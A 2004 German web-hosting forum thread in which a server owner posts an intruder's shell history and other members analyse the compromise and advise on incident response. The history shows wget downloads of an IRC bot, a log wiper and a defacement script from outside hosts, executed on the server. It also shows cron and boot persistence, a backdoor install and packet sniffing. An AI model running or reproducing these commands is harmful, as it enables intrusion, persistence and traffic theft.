Page 2 of 2
Re: Server wurde gehackt *_*
Posted: 2004-06-02 12:47
by oxygen
Konni wrote:øxygen wrote:
Naja hättest du die Ratschläge hier im Forum befolgt wäre das nicht passiert. (/tmp, /var noexec,nosuid mounten, wget, w3m, lynx, gcc etc chmod 700 setzten oder ganz entfernen)
Für den Fall, dass ich mich jetzt lächerlich mache, aber ich bin so paranoid, und mach die "gefährlichen" Befehle immer auf 000, dann kann sie keiner ausführen, und wenn ich mal brauch kann man ja kurzzeitig umändern.
Das macht keinen Unterschied. 700 heißt nur root kann sie ausführen, und der kann die Zugriffrechte sowieso immer ändern.
meins ist auch gehackt
Posted: 2004-06-13 17:22
by demo
hier ist .bash_history
Code: Select all
rm ps.htm
cd /home/www
ls
ls -al
cd /etc
ls nam*
cat named.conf |grep zone
locate httpd.conf
cat /etc/httpd/httpd.conf |grep ServerName
cd /var/tmp/...
wget http://www.btnx.com/ht.ocx
chmod 7777 *
./ht.ocx /
cd /etc/rc.d/init.d
cd /etc/init.d
wget www.pocketpctools.com/brkt
chmod 7777 brkt
mv brkt netfsd
cp netfsd /sbin/lnx86
chmod 7777 /sbin/lnx86
cd ..
cd rc.d
cat rc.local
ls
cat boot.local
echo /etc/init.d/netfsd >> boot.local
chmod 7777 /etc.init.d/netfsd
chmod 7777 /etc/init.d/netfsd
cd /var/spool
ls
cd cron
ls
cat root
echo "0 0 7 7 * /sbin/lnx86 " >> root
cd /var/tmp
ls
ls -al
cd ...
ls
rm *
wget www.pocketpctools.com/mass.sh
chmod 7777 *
./mass.sh /
pwd
wget www.pocketpctools.com/str.tgz
wget www.pocketpctools.com/str.tar.gz
tar zxvf str*
cd strobe
ls
mv strobe s
wget 200.177.162.127/lista.txt
wget 200.177.162.127/lista.txt
./s
rm lista.txt
wget 200.177.162.127/lista.txt
./s
./s -v -V -s -o lll -t 5 -n 1000 -S strobe.services -i lista.txt -f
who
finger ircd
rm brk
who
cd /root/
ls
./bin
cd bin
ls
wget http://ka0tic.topcities.com/xpl/toy.tgz
tar -zxvf toy.tgz;rm toy.tgz;cd toy;./setup 123qwe 60922
cd ..
rm -rf toy
rm ps.htm
mkdir .p
cd .p
wget 200.177.162.127/amap.tar.gz
tar zxvf amap*
cd amap-4.5
lls
ls
./configure
make
ls
./amap
./amap -A -bHdvq -o logzz www.terra.com.br
./amap -A -bHdvq -o logzz www.terra.coom.br 80
./amap -A -bHdvq -o logzz www.canalmarilia.com.br 80
./amap -A -bHdvq -o logzz 200.210.235.147 80
wget http://www.thc.org/download.php?t=r&f=thcrut-1.2.5.tar.gz
a
wget 200.177.162.127/thcrut.tar.gz
tar zxvf thcrut.t*
cd thcrut-1.2.5
ls
./configure
make all install; thcrut -h
wget 200.177.162.127/probe.tar.gz
tar zxvf probe*
cd probe-4.1
ls
./probe
./probe www.canalmarilia.com.br
./probe www.mac0nha.com
./probe -p www.canalmarilia.com.br
q
q
./probe www.uol.com.br
./probe -p www.uol.com.br
rm -rf *
wget 200.177.162.127/uht1.tgz
tar zxvf uht1*
ls -al
tar zxvf Col*
cd Collector-1.0
ls
cat README
ls
ls -al
cd Server
ls -al
make
ls
./collector
cd ..
ls
cat TODO
cd ..
ls
tar zxvf Hun*
cd Hunter-1.2
ls
make
ls
cat README
wget 200.177.162.127/snif.tar.gz
tar zxvf snif*
cd sniffit.0.3.5
ls -al
./configure
make
ls
./sniffit -h
cp sniffit /home/www/web6/html/sniffit
./sniffit
mkdir ...
cd ...
wget 200.177.162.127/sn.tar.gz
tar zxvf sn.t*
cd sniffit.0.3.7.beta
ls
sh install-sh
./install-sh
./configure
make
ls
rm /home/www/web6/html/sniffit
cp sniffit /home/www/web6/html/sniffit
./sniffit
./sniffit -v
ifconfig
./sniffit
./sniffit -P TCP -r /tmp/.snl -F eth0
uname -a
./sniffit -t 217.160.92.159 -R /tmp/.snl -P TCP
rm ps.htm
./sniffit -t 217.160.92.159 -R /tmp/.snl -P TCP &
ls -al .snl
ls -al .snl
rm -rf .snl
ls -al .snl
ls -al .snl
./sniffit -t 217.160.92.159 -R /tmp/.snl -P TCP
ls -al .snl
./sniffit -t 217.160.92.159 -R /tmp/.snl
./sniffit -t 217.160.92.159 -R /tmp/.sn
./sniffit -t 217.160.92.159 -R /tmp/.sn -F eth0
ls -al .sn*
./sniffit -t 217.160.92.159 -R /tmp/.snl -P TCP &
ls -al .sn*
pwd
./sniffit -t 217.160.92.159 -R /tmp/.snl -P TCP
ps x
kill -9 6114
ps x
PROMPT_COMMAND='pwd>&7;kill -STOP $$'
ganze index geändert
wo ist er rein gekommen und was hat er alles installiert ?
Re: Server wurde gehackt *_*
Posted: 2004-06-13 17:30
by wirsing
Keine Ahnung, das kann man daran nicht sehen.
1. Wer sagt dir, dass der Angreifer nicht extra die .bash_history modifiziert hat, um Spuren von anderen Sachen zu verwischen, die er noch auf dem System gemacht hat
2. Alle Befehle in dieser Datei wurden - wenn man einmal davon ausginge, dass die .bash_history wirklich das beschreibt, was der Angreifer gemacht hat - erst nach dem Eindringen ausgeführt, lassen also keine Rückschlüsse über den Weg dorthin zu.
3. Fahr den Server zuerst ins Rettungssystem, überleg dir dann ob du Anzeige erstatten willst, aber boote nicht mehr ins normale System. Danach solltest du den Server neu initialisieren lassen oder selber neu installieren.
Re: Server wurde gehackt *_*
Posted: 2004-06-13 17:40
by demo
danke dir, mit anzeige wird es nichts, lasse den server lieber neu installieren.
Re: Server wurde gehackt *_*
Posted: 2004-06-13 17:55
by captaincrunch
1. Wer sagt dir, dass der Angreifer nicht extra die .bash_history modifiziert hat, um Spuren von anderen Sachen zu verwischen, die er noch auf dem System gemacht hat
Gut kombiniert, Watson:
Code: Select all
[chris@shadow kiddie]$ head -8 ht.ocx
#coded By kieger
clear
if [ "$1" != "" ]
then
echo "Disable and Clean bash_history Command LOG"
echo "" > /root/.bash_history
echo "bash_history Command LOG is Disabled and Cleaned"
echo ""
danke dir, mit anzeige wird es nichts, lasse den server lieber neu installieren.
...damit die Kiste danach sofort wieder zur einfachen Beute wird?
Re: Server wurde gehackt *_*
Posted: 2004-06-13 18:01
by demo
...damit die Kiste danach sofort wieder zur einfachen Beute wird?
@CaptainCrunch, auch nach dem neu installation oder wie ?
Re: Server wurde gehackt *_*
Posted: 2004-06-13 18:07
by wirsing
Re: Server wurde gehackt *_*
Posted: 2004-06-13 18:10
by demo
alles in eimer jetzt
Re: Server wurde gehackt *_*
Posted: 2004-06-13 18:13
by captaincrunch
Ja, denn anscheinennd hat das Kiddie keine Probleme gehabt, deine Kiste (wodurch auch immer) zu rooten.
Btw.: Kleine Analyse der runtergeladenen Tools:
1. brkt
Verbindet sich ins IRC, kann Files downloaden, DOSsen und ein paar andere Kleinigkeiten.
2. ht.ocx:
"Reinigt" die .bash_history, grabbelt den Servernamen aus der httpd.conf
3. mass.sh:
Kleines Mass-Defacement-Script, das u.U. auch noch weitere Hintertüren ins System einbaut
4. amap:
Amap is a next-generation scanning tool, which identifies applications and services even if they are not listening on the default port by creating a bogus-communication and analyzing the responses.
5. strobe:
Relativ einfacher Scanner
In Kurzform: deine Kiste ist eine Gefahr für sämtliche andere Netzteilnehmer.
Re: Server wurde gehackt *_*
Posted: 2004-06-13 18:14
by wirsing
Das Ganze sieht mir noch nicht sehr nach Rescuesystem aus. Worauf wartest du noch? Bist du dir dessen bewusst, welchen Wert dein Rootserver auch als Waffe haben kann?
Re: Server wurde gehackt *_*
Posted: 2004-06-13 18:16
by captaincrunch
1. Komplettes ACK zu wirsings letztem Satz.
2.
2.4.21-lufs-030704
Die Frage, wodurch du gerootet wurdest ist jetzt nicht dein Ernst, oder?
Re: Server wurde gehackt *_*
Posted: 2004-06-13 18:25
by demo
habe ihn jetzt runter gefahren, ich hatte heute mittag einen auf irc opper access gegeben mit vollem irc root zugriff rechte, aber kann er mit dem sich per schell einloggen?
Re: Server wurde gehackt *_*
Posted: 2004-06-13 18:28
by demo
http://www.google.de/search?sourceid=na ... s%2D030704
was genau ist den das Captain ?
war der Kernel Version schuld
Re: Server wurde gehackt *_*
Posted: 2004-06-13 18:48
by captaincrunch
Ist die Frage dein Ernst? Die Antwort findest du zuhauf hier im Forum.
Re: Server wurde gehackt *_*
Posted: 2004-06-13 18:52
by demo
ok ich suche dann mal
Re: Server wurde gehackt *_*
Posted: 2004-06-13 18:55
by captaincrunch
Da dur des Rätsels Lösung ja wirklich nicht zu kennen scheinst: der von dir eingesetzte Kernel enthält mehrere Sicherheitslücken, durch die (immerhin) lokale User root-Rechte erhalten können, was wohl auch hier mit ziemlicher Sicherheit der Fall war.
Die Frage, wie derjenige auf's System kam, lässt sich ohne weitere Kenntnis deines Systems nicht beantworten, aber ich rate einfach mal: PHPNuke!?!
Wie auch immer: alleine die Tatsache, dass du anscheinend nicht durch die Security-Mailingliste(n) deines Distributors aufgeschreckt worden bist zeigt eigentlich, dass du grob fahrlässig gehandelt hast.
Re: Server wurde gehackt *_*
Posted: 2004-06-13 19:10
by demo
Capitain hast recht, habe mich nicht so für die sicherheit gekümmert, und wie ich denke war phpbb die haupt tüer,
ist bei suse 9.0 der kernel jetzt sicherer ?
Re: Server wurde gehackt *_*
Posted: 2004-06-13 19:19
by captaincrunch
ist bei suse 9.0 der kernel jetzt sicherer ?
Ein ein gefixter Kernel deiner alten Version hätte bereits gereicht.
Re: Server wurde gehackt *_*
Posted: 2004-06-13 19:27
by Outlaw
DEMO wrote:Capitain hast recht, habe mich nicht so für die sicherheit gekümmert, und wie ich denke war phpbb die haupt tüer,
ist bei suse 9.0 der kernel jetzt sicherer ?
PHPBB ?? Wie alt waren denn die Foren ??
Gruß Outi
Re: Server wurde gehackt *_*
Posted: 2004-06-13 19:52
by captaincrunch
phpbb kann ich mir spontan auch nicht vorstellen, da seit geraumer Zeit da zwar Lücken aufgetaucht sind, diese aber normalerweise einem Angreifer keine Shell geliefert hätten.
Na ja, wie gesagt: man kann nur vermuten. Wenn du sämtliche Updates so gehandhabt hast, gibt's da diverse Möglichkeiten, wie derjenige rankam.
Re: Server wurde gehackt *_*
Posted: 2004-06-13 20:12
by demo
die phpbb version war wie hier im forum, da hatte mich schon jemand gewarnt wegen der sicherheitslücke in phpbb mit dem mann root pass auslesen kann, deshalb sollte ein patch drauf machen aber war zu spät.
Re: Server wurde gehackt *_*
Posted: 2004-06-13 22:55
by captaincrunch
da hatte mich schon jemand gewarnt wegen der sicherheitslücke in phpbb mit dem mann root pass auslesen kann, deshalb sollte ein patch drauf machen aber war zu spät.
Das "root pass" hat im Allgemeinen nichts mit dem Admin-Passwort des phpbb zu tun; auch wir hier waren Opfer eines solchen Angriffs, das ganze betraf aber
ausschließlich das phpbb, derjenige kam totzdem nicht annähernd ans darunterliegende System.
Sofern man natürlich so dämlich ist (sorry, aber anders lässt sich das dann nicht mehr sagen), die gleichen Passwörter dafür einzusetzen ist man wirklich selbst Schuld.
Re: Server wurde gehackt *_*
Posted: 2004-06-14 18:37
by theomega
bringt aber auch nichts, da phpbb das passwort md5hasht, also man dann wieder bruteforce bräuchte!